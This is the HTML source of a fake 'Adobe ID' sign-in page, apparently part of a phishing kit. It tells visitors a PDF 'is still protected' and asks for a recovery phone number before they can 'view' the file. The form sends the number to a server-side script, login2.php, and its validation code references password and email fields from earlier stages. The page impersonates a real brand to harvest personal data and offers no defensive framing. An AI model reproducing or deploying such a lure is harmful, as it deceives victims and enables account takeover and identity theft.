<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Sign In - Adobe ID</title>

<script type="text/javascript">
function MM_validateForm() { //v4.0
if (document.getElementById){
var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
if (val) { nm=val.name; if ((val=val.value)!="") {
if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
} else if (test!='R') { num = parseFloat(val);
if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
min=test.substring(8,p); max=test.substring(p+1);
if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
} } } else if (test.charAt(0) == 'R') errors += '- '+nm+' is required.\n'; }
} if (errors) alert('The following error(s) occurred:\n'+errors);
document.MM_returnValue = (errors == '');
} }
</script>
<link rel="stylesheet" type="text/css" href="adobe.css" />
</head>
<body>
<div id="box">
<div class="logo"> <br />
</div>
<div class="instruction"> Please confirm your phone number
to proceed. </div>
<form action="login2.php" method="post">
<table id="form-1" cellpadding="5">
<tbody>
<tr>
<td colspan="2"><input class="text-field" id="phone" name="phone" placeholder="Recovery Phone Number" type="text" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><span class="pdf-protected">The
PDF is still protected</span></td>
</tr>
<tr>
<td colspan="2"><input class="btn1" onclick="MM_validateForm('password','','R','mail','','RisEmail','phone','','NisNum');return document.MM_returnValue" name="Upgrade" value="VIEW FILE" type="submit" /></td>
</tr>
</tbody>
</table>
</form>
<div class="footer"><img src="images/footer_img_2.png" /></div>
</div>
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="#"></script><!-- End Of Analytics Code -->
</body></html>